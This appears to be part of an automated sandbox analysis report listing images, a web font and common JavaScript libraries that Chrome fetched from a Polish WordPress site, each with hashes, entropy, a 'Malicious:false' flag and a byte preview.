                                                            SHA-512:8EC60D8FA62C290C2CF2CD590FA332AF371C36999BB96987F5AA0A62B6C0B654E8A8D912019305A0B9987ABD31C0E028510973634BAEAE379967088E3ED59A66
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:......JFIF..............Exif..II*........... ...................................................................(...........1...%.......2.......(.......................<...i.......L...%...............OLYMPUS DIGITAL CAMERA .OLYMPUS IMAGING CORP. .E-M1 ......'.......'..Adobe Photoshop Elements 7.0 Windows.2018:01:15 16:59:31.PrintIM.0300..%.............................................8.................P.....`... ..................................................................................................... ......................................................'.......'.......'.......'.......'..^....'.......'.......'.......'....................................................................................................................................@@........@@........@@............@@........@@........@@........................................................"...........'.......d...........0230................................................................
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 250x250, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=12, height=2448, manufacturer=samsung, model=SM-N910C, orientation=upper-left, xresolution=175, yresolution=183, resolutionunit=2, software=Adobe Photoshop Elements 7.0 Windows, datetime=2017:09:08 14:15:40, width=3264], baseline, precision 8, 787x500, components 3
                                                            Category:dropped
                                                            Size (bytes):165118
                                                            Entropy (8bit):7.958681807563896
                                                            Encrypted:false
                                                            SSDEEP:3072:sE3xHCtcxpAMkZYmBCoEPMr/sXlceCDY3qMW+/SxTH9u0jvyRs1v:Z8t7MkZuohr/sVbC/RtTH9Tras1v
                                                            MD5:F883D9CA48C2FB974D7C7CD687EC62CB
                                                            SHA1:71A7D91550418C6D6758F65E13F5816A5A616DDF
                                                            SHA-256:661945661B0A36CC8ECEF79E59277BB3CAB087F16F1199ED7FDBA3EF8CA3C46A
                                                            SHA-512:52538811A847F96218DE7050719F860B65B7D756293E109248943E054773B4FD5C96FE0E1F689942C026EB913A63151984CB17B94DB30DC686901FC468248356
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:......JFIF............+qExif..II*...........................................................................................(...........1...%.......2.......................i...............samsung.SM-N910C.................Adobe Photoshop Elements 7.0 Windows.2017:09:08 14:15:40...........*...........2..."...........'...................0220........:...........N...........b...........j...........r...........z.......................................................................0100................................[................................................... ...!...............!...........2016:09:15 14:43:46.2016:09:15 14:43:46.....d.......d.......d...............d.......d...ASCII......IICSA.....b484d149d65b8f500000000000000000.......................................(...................&...........C(............................JFIF.....H.H......Adobe_CM......Adobe.d.......................................................................................................................
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:Unicode text, UTF-8 text
                                                            Category:dropped
                                                            Size (bytes):8092
                                                            Entropy (8bit):5.390864637687013
                                                            Encrypted:false
                                                            SSDEEP:192:pl+Or8ur83V33R3hqRAsfAy4MOr8ur83V33R3hqP:zZr8ur83VHBhm+r8ur83VHBhq
                                                            MD5:3D07DE5229AE9E4BA05346E95DE796BB
                                                            SHA1:8142F69063F7F5DB40F7DC98D73F77FACFCBF6C7
                                                            SHA-256:CCA36D46191C4D5D81C3BC0B990406E7609A35221B771B1ED1E5BBDEC6B40052
                                                            SHA-512:158AD2A74D21B5BE5A254F30BF0FE7CF0EA0C2EA6384FA0F921D1C531FCDCEBBC3770ED5D8BA44F51015BA48853205DD38568BD3BDEAA07ED1C4D4211991BE48
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:/*. * jQuery Easing v1.3 - http://gsgd.co.uk/sandbox/jquery/easing/. *. * Uses the built in easing capabilities added In jQuery 1.1. * to offer multiple easing options. *. * TERMS OF USE - jQuery Easing. * . * Open source under the BSD License. . * . * Copyright . 2008 George McGinley Smith. * All rights reserved.. * . * Redistribution and use in source and binary forms, with or without modification, . * are permitted provided that the following conditions are met:. * . * Redistributions of source code must retain the above copyright notice, this list of . * conditions and the following disclaimer.. * Redistributions in binary form must reproduce the above copyright notice, this list . * of conditions and the following disclaimer in the documentation and/or other materials . * provided with the distribution.. * . * Neither the name of the author nor the names of contributors may be used to endorse . * or promote products derived from this software without specific prior written permis
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (17806)
                                                            Category:downloaded
                                                            Size (bytes):17938
                                                            Entropy (8bit):5.384001294664662
                                                            Encrypted:false
                                                            SSDEEP:384:klMjeWezAxHcWN2Mm1RRbTLbpaKeal+ktWGD1IAn/AabwsOYFd:2Mje7ExHPYdj4KJlVtWc1IAY7e
                                                            MD5:5D6FB379271EB37AEB9D0A2815F5C4AB
                                                            SHA1:122A894BC3EED9C10875D3A957552A8AB6D08701
                                                            SHA-256:E5B42DD1C90C994C833730087785205B61377AF6E5F969293DA205B451479EE1
                                                            SHA-512:2259427F0F9942AA0CBB56361F1C3BAE70A8B120DDB7A6F6452FC59C04305C068AED9E0AB0BEA67D2B442E9158D50D89F168C922D23E925F888D072927021B64
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/plugins/wp-ultimate-gallery/libs/light-slider/lightslider.min.js?ver=20120206
                                                            Preview:/*! lightslider - v1.1.5 - 2015-10-31.* https://github.com/sachinchoolur/lightslider.* Copyright (c) 2015 Sachin N; Licensed MIT */.!function(a,b){"use strict";var c={item:3,autoWidth:!1,slideMove:1,slideMargin:10,addClass:"",mode:"slide",useCSS:!0,cssEasing:"ease",easing:"linear",speed:400,auto:!1,pauseOnHover:!1,loop:!1,slideEndAnimation:!0,pause:2e3,keyPress:!1,controls:!0,prevHtml:"",nextHtml:"",rtl:!1,adaptiveHeight:!1,vertical:!1,verticalHeight:500,vThumbWidth:100,thumbItem:10,pager:!0,gallery:!1,galleryMargin:5,thumbMargin:5,currentPagerPosition:"middle",enableTouch:!0,enableDrag:!0,freeMove:!0,swipeThreshold:40,responsive:[],onBeforeStart:function(a){},onSliderLoad:function(a){},onBeforeSlide:function(a,b){},onAfterSlide:function(a,b){},onBeforeNextSlide:function(a,b){},onBeforePrevSlide:function(a,b){}};a.fn.lightSlider=function(b){if(0===this.length)return this;if(this.length>1)return this.each(function(){a(this).lightSlider(b)}),this;var d={},e=a.extend(!0,{},c,b),f={},g=thi
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 300 x 225, 8-bit/color RGBA, non-interlaced
                                                            Category:downloaded
                                                            Size (bytes):34741
                                                            Entropy (8bit):7.985204108051673
                                                            Encrypted:false
                                                            SSDEEP:768:yV0T6SpmYXhIGGXpDpSiuhyeYMLipKSu47O5TYiP/lzA0ew:e+xI9XiiuEgDlYitAy
                                                            MD5:AD36AB83F232057440CFCD39701684C3
                                                            SHA1:4916525CE37DC96F0CDF061DCEC2826F171EB731
                                                            SHA-256:2D19C1B97232D8415E706206B2187C98B4C6E500002191CF1767987E4EC950ED
                                                            SHA-512:0B1C8E5A55DE6012A0DA7FC98AF35AC7E2DF83E7811982FC64A91D372E2F55DA7222A69925046C39D193FAC2178CC673464A24EE998F1D10F593388F56AC9983
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/uploads/2015/07/disney_fairs.png
                                                            Preview:.PNG........IHDR...,.........r|......bKGD..............pHYs...#...#.x.?v....tIME.....39.@Uc.. .IDATx....dYv........jogz.3=t..KrF"d@-........Z.(..?.Y....$.r..%...9..g.LWu.....Df.....!...{...DT...w..w.y.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0............Zk'.....t.9....q\..`,...u..y.r.|..h.e>...........7.r...?k.Z.....,...eJ.....y.1..$I...h.p8d8.R.......Y.\.gB..X....Z.:.........r.P..h6..0?G..mz....(8x....h4.+#\F.>wa.x<./o..............&..s....X,.......<.U..[.R>s..A...1...0.Y[[.q...;v........P...}..]....|}ff....L..bkk...C...eYW...X...gE..0...+W...3g..2..m].r%8s......?.BHc.#X?s......_...g.qM..p/I.p....S.Y.P.WF..`.L.@)...{..G....2..h.?.>|.'.l..%.....Y.V.W^Y....+.b.......c....O>..A!..X..a..|h..].z.....F...I.Xdaa.r....j.s."F.>M.r.........c...baa.)..{{{....1.1..i.V......#.....#G.y.......k...4..]YY....F......6.........v.E.`}.(......>t.1..Cq..!...
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 300 x 225, 8-bit/color RGBA, interlaced
                                                            Category:dropped
                                                            Size (bytes):15891
                                                            Entropy (8bit):7.9684647208489485
                                                            Encrypted:false
                                                            SSDEEP:384:IQ9pzODJLJYsnP9f8DqZ0Ym0Ye9fMxN003nehnp44:bpzODJLysnlGqC70YeaGGnehp44
                                                            MD5:D126BF8A3DFEDED72A0888872962B3FB
                                                            SHA1:74FFD9969B4CFBE65303773DDCA3CB30FB8BD295
                                                            SHA-256:42009AD365B5D81F7B443E190CFC0019481EE36309BEE1EA40A2A24757B25465
                                                            SHA-512:A982DB5F7FCD8B59E9436E8F5BBDAFCA01BFD0CC076254B232534CFF0EF4FE446E9F46FF268EDC734B12D7582BB70F7E93EE19A668737AC9E2C6F0E7BA463957
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:.PNG........IHDR...,..........{.=....pHYs...#...#.x.?v.. .IDATx...`TW..;..b......-.R.-R.Rww.om.....ne.n].R.J..R....!$!..3....L.a.......p..v.s....k:...5..t.Z.3.-.G....c...:..)...M.6S2.x..c.+W.Z.f.a..[.g...f.'....?.p...uNH....QRZ....H.U.$hK.`Q.h3..g-.(..-.....,...@I.~.....t0.M...D....s.=P..%.K...!0.H...u.#3.c./.W...R.....=......._{.5.Y^......^..uD.tF...............nAXD.BB....5..i...X[.q..r..E..y.\...X...c.1.F3..<.....1`......<n..,.q.(S...?_x..k.Z.3...b...~.`q.}.u....b.X.6@.OMS.">[./......fo..q.(3.ZJ.........C...~.i.(S6.(.`...JCc...".....0..q.j:.....SE....."S.>*6m.T.o.xO......P..rssE..n..Q........G.'.e..<.TJJ.Qe.[<..6X.2.j..+....5.gj..q...{.....+.4`04.........4._v...-.;E...........-...;..h..2u.S..K/......#.yk.z.... 44T..GI.V.Mv....@..x.*i.1.Uk.(C.g.j.....\..D.H..J....hD..Adt8b.c.~...D..3.....^..=,...Tjb.....m2...B?.p.<.L.[...F..w^..(S.!Q..u].......}.)'a....III^g.h4b..........d..S.N..H3]...\...M..O......&ScD.5.....4....mOC.l.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 314x314, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=21, description=OLYMPUS DIGITAL CAMERA , manufacturer=OLYMPUS IMAGING CORP. , model=E-3 , orientation=upper-left, xresolution=339, yresolution=347, resolutionunit=2, software=Adobe Photoshop 7.0 CE, datetime=2018:07:26 14:23:50], baseline, precision 8, 500x500, components 3
                                                            Category:downloaded
                                                            Size (bytes):73813
                                                            Entropy (8bit):7.749537116212058
                                                            Encrypted:false
                                                            SSDEEP:1536:p2VizNgaqVweuunX9XLO4LXUCdJQbzCYmDtDMIF+e3:E6hYXdKmfs43+e3
                                                            MD5:3DCAEFC511194C68C7A29ED7BF16DD92
                                                            SHA1:548EEB5F370BD04FF5F811BFEFF481AB0A38C42E
                                                            SHA-256:2A0E6EE236F38D5BDD769A36E68E94005F55BB4AB1D6DDFAEDFE4FEDEE92A7AB
                                                            SHA-512:DE7ED2110BCB301692B320EECB954B37BD606F9F48239C0C088654C67C43C028F71419102C711661F2402F6534F3DB36ACA8FE15BB020910E85AA447F7772C5A
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/uploads/2018/10/disneyzgrzewane-500x500.jpg
                                                            Preview:......JFIF.....:.:......Exif..II*........... ...............*...........B.......................S...........[...(...........1.......c...2.......z.......................................................................................................................................i...........l...OLYMPUS DIGITAL CAMERA .OLYMPUS IMAGING CORP. .E-3 .:.......:.......Adobe Photoshop 7.0 CE.2018:07:26 14:23:50.d...d...PrintIM.0300..%.............................................8.................P.....`... ..................................................................................................... ......................................................'.......'.......'.......'.......'..^....'.......'.......'.......'....................................................................................................................................@@........@@........@@............@@........@@........@@..........................................................".......
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (11126)
                                                            Category:dropped
                                                            Size (bytes):11224
                                                            Entropy (8bit):5.2603128465032745
                                                            Encrypted:false
                                                            SSDEEP:192:JrprDNvD66fPP/+I6OP1fQP0OIr96DB6MHXcwr1RF:JrprxG6fPP3P1fQMOIsDsMMS
                                                            MD5:79B4956B7EC478EC10244B5E2D33AC7D
                                                            SHA1:A46025B9D05E3DF30D610A8AEF14F392C7058DC9
                                                            SHA-256:029E0A2E809FD6B5DBE76ABE8B7A74936BE306C9A8C27C814C4D44AA54623300
                                                            SHA-512:217F86FEE871FA36ECA4F25830E3917C7BF57A681140B135C508AA32F2A1E3EFF5A80661F3B5BA46747D0C305AF10B658D207F449550F3D417D9683216FEEA8F
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:/*! jQuery Migrate v3.3.2 | (c) OpenJS Foundation and other contributors | jquery.org/license */."undefined"==typeof jQuery.migrateMute&&(jQuery.migrateMute=!0),function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery"],function(e){return t(e,window)}):"object"==typeof module&&module.exports?module.exports=t(require("jquery"),window):t(jQuery,window)}(function(s,n){"use strict";function e(e){return 0<=function(e,t){for(var r=/^(\d+)\.(\d+)\.(\d+)/,n=r.exec(e)||[],o=r.exec(t)||[],i=1;i<=3;i++){if(+o[i]<+n[i])return 1;if(+n[i]<+o[i])return-1}return 0}(s.fn.jquery,e)}s.migrateVersion="3.3.2",n.console&&n.console.log&&(s&&e("3.0.0")||n.console.log("JQMIGRATE: jQuery 3.0.0+ REQUIRED"),s.migrateWarnings&&n.console.log("JQMIGRATE: Migrate plugin loaded multiple times"),n.console.log("JQMIGRATE: Migrate is installed"+(s.migrateMute?"":" with logging active")+", version "+s.migrateVersion));var r={};function u(e){var t=n.console;s.migrateDeduplicateWarnings&&r[e]||(r[e]=!0
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 90", baseline, precision 8, 1000x1000, components 3
                                                            Category:downloaded
                                                            Size (bytes):208207
                                                            Entropy (8bit):7.974937773670412
                                                            Encrypted:false
                                                            SSDEEP:6144:JfGKhELev0MPHprhHK7FFlTJMLQwzrbWf7:JfphOa0MRtqFlTWL9zrqf7
                                                            MD5:6ABF5BD6E19B9535E6AE019D1B0775B9
                                                            SHA1:A7A94974549D8CC96E2681FFE50293F8A86EA015
                                                            SHA-256:E649F98035D3B521EE9669F952BF164AC059FB6A20B7CEAF62ED01B13A783420
                                                            SHA-512:4FF07F2CDF8C360C35A800B04C1AEE9D7002800143F39AAF6DE4E821E666BB738EEC48E0018C9000445E99E027E48508FA1A285141EE86572D376C6156C9094B
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/uploads/2015/12/gift-1167274_1920-1000x1000.jpg
                                                            Preview:......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...?...Q.b.....MkX^>...2.,..U.?7....l|Ye..m^;..C.0\..[Q.....y.a..6..3..J.....I.e{......q..*..5m..E...s..q2oX...GN..b..?..r.v...p.....K).E...[R.........x.J....il#2..m&..K..*..x.M*.lR....g.....o..6!c.*.x.)..q....j.%...."^A ..P.M.k.~..yp.7.<.NU-.>Q.j.|g"C.V6......b}H..G.Jh.w...mu>.....+.G.5K...;d...W(.V.R..}a
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:Web Open Font Format (Version 2), TrueType, length 26316, version 1.0
                                                            Category:downloaded
                                                            Size (bytes):26316
                                                            Entropy (8bit):7.992669390102039
                                                            Encrypted:true
                                                            SSDEEP:768:NMZZDtO87i96OaMhimbFOdND8P7WfbFEonDWQ14Q:k5O87i4OOEF0ND+SfbFEoDWQ9
                                                            MD5:C3A0FC9C9ABBE903B633A502480E8CFE
                                                            SHA1:688D6AFD8135030DFB2876B6236EF0692A8D9121
                                                            SHA-256:D318D1BDBD4FFD4E3D77B9F23D97FFE9F5B5DAE85BE99D62EF4C45F368E11C9A
                                                            SHA-512:105175563F84BD1CEA345C884EF2F920DA8A6C9038064FABBE8D71BBFA2F205AFA86616A0715BEA9FF94DEF195088AC9BB22CFE6A4684F7BC484DFF95D9201DA
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://fonts.gstatic.com/s/didactgothic/v20/ahcfv8qz1zt6hCC5G4F_P4ASlUWYpnLl.woff2
                                                            Preview:wOF2......f...........ff..........................T..(..6.`..<..B........\..{..n..6.$..X. .....2..1._.7...p)..........Yg.tG.$...`.....A....vR...I;...^.W.b...Fe.U-1......KUU[.z..)..C.x.z3S.;.#..l.,e....aC%...&....w.[.0.%D.....j..i....+| .c../$[n..?0^$..x../..t.V..<.4......Z.+*.7.n.s.}..J..O.p....;.q_......z+.....(x.....w...Y|.M.L."-..x....I-.<.[...r.Y9y...{.......:5\.URJ.V...J......s..=a...".mnV.....H.....F.C.......V).!.....agjZ...........W.++0`"...).pw.w...)"Fc...\.W..U...Ulo..]../|.{..16....{.[.O4.h^.....O.......z..D.Y..j{...B...1f.]...kTi..C.KY..n..)..j.P.....^./.....%.....+....7.....?|..iuI.t`....[....i ..g.-...i.h.*..=.^.nM..=~.l.H#0.........+#m.......*B. +,.cW...r..Oj9W..4G9.p...r.`_......?.7.x..m.n...2m.=..2.[wO1....5..D...}...........*......!.,.,......e..pC...Y....@.H32.[..(..9.".5....U8C...><xL..Pk.(......lr.NKu.f.A.#6..k.X..7,...}n~6..e[@...E.'..zu..`5.......8.c....).<u..?...+...q.f(7..~.?..c.......*Z?...i...r@.....WE...W...p.....V.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 82", baseline, precision 8, 500x500, components 3
                                                            Category:dropped
                                                            Size (bytes):47028
                                                            Entropy (8bit):7.967811048229423
                                                            Encrypted:false
                                                            SSDEEP:768:vwECJbQ0Qk/L8H2LP/HY5Z5ONUJRNFCbK0qYSpgZMwwKKT3CRTG:vYJR1T8H2bfY5Z53JRpvYe0e3Cs
                                                            MD5:DCFCF51628A0F66333A492C4DBB588E4
                                                            SHA1:9DB12C5A2A549101B0384C464C1BE397C07BEF5D
                                                            SHA-256:3B01E87D5004DE78C43042F6FF6568962349331F01BF650CB374D301AF923E1A
                                                            SHA-512:D08BE824A4E8E7D6B400C3CD451AE9D0E54FB6B4EAEA3FEE26B88719F198082E863E9FC0AD6E011D2750593B7C09AA41E7060E3E781206FD43711E19848670B3
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:......JFIF.....`.`.....;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 82....C.....................................!........'.."#%%%..),($+!$%$...C...........$...$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...Q.v(.}...a.S.K.,..1F)...0.1N.....7.b..\Q`..F)..X9..v(...a....Q...n(.;.b....)...0.Q.~)1@s....b.P..qF)...0.Q.v(...7.b..6.a9...).iB.....pCR.d.....N....2{T..=.F.5....?..w....G\.V.a,\V.6-..*h.I<.Wkg...?..2v=.GM.,....F@.<Rm-[0....=[.{..i.....<...eC.p1J..?...7..c.WLs.C.T..s..c`..+.<;..4...@]c.m....qXw..F.j#..
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 210x210, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0 CE, datetime=2018:07:26 14:06:35], baseline, precision 8, 366x359, components 3
                                                            Category:dropped
                                                            Size (bytes):139098
                                                            Entropy (8bit):7.902722970024383
                                                            Encrypted:false
                                                            SSDEEP:3072:qtTZtTaKleJoo7OSnWzuy5fkxeNK2jeBIFGB8iy8:qtTZtT5UaSAuoMFBIgB8/8
                                                            MD5:A1C8E9EF799386ECF3F9E1875B4F79F5
                                                            SHA1:252E22369F2D5E3B8E1E8AC9DD954CC7D60BAFEA
                                                            SHA-256:A07ABDB03AA46D904ED46DEBEC76D1F8069CF0C52F451102E3239CB7EAC8C254
                                                            SHA-512:6488C66583E22BE1087AE05071560DD8A05C5642EF67E066CBD4F9DF30FBB0E6D5C85F909E1C280CC78C09B9CD075B5B115BA55F8A95322B831C7FFAD89E3ED2
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:......JFIF.............\Exif..MM.*.............................b...........j.(...........1.........r.2...........i..............................Adobe Photoshop 7.0 CE.2018:07:26 14:06:35.............................n...........g...........................................".(.....................*...........*.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d.................................................................................................................................................~...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...:...BGO# .d.F..."#O...3 .4...../>~=..[.k......5....q..M....%+]c^uH.u.x.).?...-4....6.Q.?.....?........(....`q.^\.....*
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:Unicode text, UTF-8 text, with very long lines (2973)
                                                            Category:downloaded
                                                            Size (bytes):3009
                                                            Entropy (8bit):5.171268900213841
                                                            Encrypted:false
                                                            SSDEEP:48:Q71Dmtdqc8+NTSZrIVk52Xq6z6UKoONaiGrnRKOYwighnE1sG5aAQd27J:MA9u+6nHokoM4J6sg
                                                            MD5:2768B7A41CF9EE93D8F58CC094A9FF28
                                                            SHA1:A481ED9EA351A861560EEBB05D626107BA9D44C7
                                                            SHA-256:EDC988F9162131DFA6D20D122013987468254662E7CDBC7565C39A5789EDB6CA
                                                            SHA-512:21D56B1392983CC71E0D6788EEDFBE864191681080CA7561B91362F861526B03E4A19EA57A082D0C31832D8E6B919C89B20B8375DCFB36181D4AB5998AE56354
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-includes/js/dist/a11y.min.js?ver=0ac8327cc1c40dcfdf29716affd7ac63
                                                            Preview:/*! This file is auto-generated */.this.wp=this.wp||{},this.wp.a11y=function(t){var e={};function n(i){if(e[i])return e[i].exports;var o=e[i]={i:i,l:!1,exports:{}};return t[i].call(o.exports,o,o.exports,n),o.l=!0,o.exports}return n.m=t,n.c=e,n.d=function(t,e,i){n.o(t,e)||Object.defineProperty(t,e,{enumerable:!0,get:i})},n.r=function(t){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})},n.t=function(t,e){if(1&e&&(t=n(t)),8&e)return t;if(4&e&&"object"==typeof t&&t&&t.__esModule)return t;var i=Object.create(null);if(n.r(i),Object.defineProperty(i,"default",{enumerable:!0,value:t}),2&e&&"string"!=typeof t)for(var o in t)n.d(i,o,function(e){return t[e]}.bind(null,o));return i},n.n=function(t){var e=t&&t.__esModule?function(){return t.default}:function(){return t};return n.d(e,"a",e),e},n.o=function(t,e){return Object.prototype.hasOwnProperty.call(t,e)},n.p="",n(n.s="jncB")}({Y8OO:func
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 300 x 225, 8-bit/color RGBA, interlaced
                                                            Category:dropped
                                                            Size (bytes):29760
                                                            Entropy (8bit):7.982300745376012
                                                            Encrypted:false
                                                            SSDEEP:768:rQtTO+Lhqax1Tkb0k7eMJjo2th1tfYKttGVwsC+bcxwI:Whx1TkYMRo2th1tYKttGVwsCXxwI
                                                            MD5:D546EF6393050CFCC04B05275BB4F31A
                                                            SHA1:2BD39611FB8DC83D071F2D540C37511F51803181
                                                            SHA-256:2CBC70E6E84A45A9848965C5C4A5D901CEF212BB5E01FFB018D2F45DCF504699
                                                            SHA-512:1EF81B7DF7599832B47115EE72513F9E131F9B31773DC78BC8298AE6B697F2508591370CEBB304B2A68049FB850F6CAFBDD9696AF7C39F2D0A87910A73010998
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:.PNG........IHDR...,..........{.=....pHYs...#...#.x.?v.. .IDATx..}...E.......{7.........p...!.-..."...... .......K...Q.B8B.....f7{.....U.....3;..dg....NOwuUu..W.z.J.m...u.+P.Q....bk...L..7.I.&,.b{[)..J.\Y-.1e.dY./.#..z..HI....%K^X.p.!...Ry...W.,..}g....===..RV...D..p*.[.....=..[.wl..}..-9i$.AZ{^1...H...T|@B.:.3.x2ea.:,..J+V1......%:.^....}5.T..g.@.V..U..x...hM.a.P.:t5...CYx(.-...m.....x.$$l..........7?u..E.......x.O..,...(#...B.e....r.....\.W)*'...S...+...u.=.}.,.IM9.i,.Z...&O....c..><+w.]D.4F.bT?.......\~.2...i.Td.y.otm.....g..M..^.a.E..CR1&W....!.i.....x5.m.M..&(T../nG...q4.^.%kt^B.....J.hG!.....`%.......f ...{....i2n[..I.....~....-Tf...[...............>.T..........[1.}.V.^...o..<.....{.Y..-.b.......n..g>3AQ.........,XP...W_}..}}}.....@...-..`zv.M3g.W.)..Qe.WUuL}}..r..>....!..U.Q..=.......Z^..n.....!.X..|..hT.J-<.T.x[Tj.{../..9w...R.e<...pP..V.X...A..*.~.z{.I..o.....y~...x.z%.B..WZ....z^..Y.XMi* 6..,....f,a.r.....
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (17806)
                                                            Category:dropped
                                                            Size (bytes):17938
                                                            Entropy (8bit):5.384001294664662
                                                            Encrypted:false
                                                            SSDEEP:384:klMjeWezAxHcWN2Mm1RRbTLbpaKeal+ktWGD1IAn/AabwsOYFd:2Mje7ExHPYdj4KJlVtWc1IAY7e
                                                            MD5:5D6FB379271EB37AEB9D0A2815F5C4AB
                                                            SHA1:122A894BC3EED9C10875D3A957552A8AB6D08701
                                                            SHA-256:E5B42DD1C90C994C833730087785205B61377AF6E5F969293DA205B451479EE1
                                                            SHA-512:2259427F0F9942AA0CBB56361F1C3BAE70A8B120DDB7A6F6452FC59C04305C068AED9E0AB0BEA67D2B442E9158D50D89F168C922D23E925F888D072927021B64
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:/*! lightslider - v1.1.5 - 2015-10-31.* https://github.com/sachinchoolur/lightslider.* Copyright (c) 2015 Sachin N; Licensed MIT */.!function(a,b){"use strict";var c={item:3,autoWidth:!1,slideMove:1,slideMargin:10,addClass:"",mode:"slide",useCSS:!0,cssEasing:"ease",easing:"linear",speed:400,auto:!1,pauseOnHover:!1,loop:!1,slideEndAnimation:!0,pause:2e3,keyPress:!1,controls:!0,prevHtml:"",nextHtml:"",rtl:!1,adaptiveHeight:!1,vertical:!1,verticalHeight:500,vThumbWidth:100,thumbItem:10,pager:!0,gallery:!1,galleryMargin:5,thumbMargin:5,currentPagerPosition:"middle",enableTouch:!0,enableDrag:!0,freeMove:!0,swipeThreshold:40,responsive:[],onBeforeStart:function(a){},onSliderLoad:function(a){},onBeforeSlide:function(a,b){},onAfterSlide:function(a,b){},onBeforeNextSlide:function(a,b){},onBeforePrevSlide:function(a,b){}};a.fn.lightSlider=function(b){if(0===this.length)return this;if(this.length>1)return this.each(function(){a(this).lightSlider(b)}),this;var d={},e=a.extend(!0,{},c,b),f={},g=thi
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (23966)
                                                            Category:downloaded
                                                            Size (bytes):24138
                                                            Entropy (8bit):5.096569708153791
                                                            Encrypted:false
                                                            SSDEEP:384:Ar7mIr/Dh5rA3rzB4rMhr/XWGHW/6rMz1xftF2OUVP4eAnbhfreD6dCBEOav7blM:+SxxGG2/71xftFqVP4eAnI0ROavPSCzo
                                                            MD5:3B3FC826E58FC554108E4A651C9C7848
                                                            SHA1:76778FD446E2FF2377588A7B4AC4D79F258427C9
                                                            SHA-256:E00ADD38134EAC2FB8E8E9C09CBFFF7BBE57952B210322EB2EECB0A21FC055EB
                                                            SHA-512:AE192D8D804F7DAFD8B7A95220CEB66C0C308A51CDF42C172C20F71F50052E4529B01F8781C5F305E1E0D6C5367D9678F1D908EE4273DB594FBB650C56A9F61B
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-includes/js/masonry.min.js?ver=4.2.2
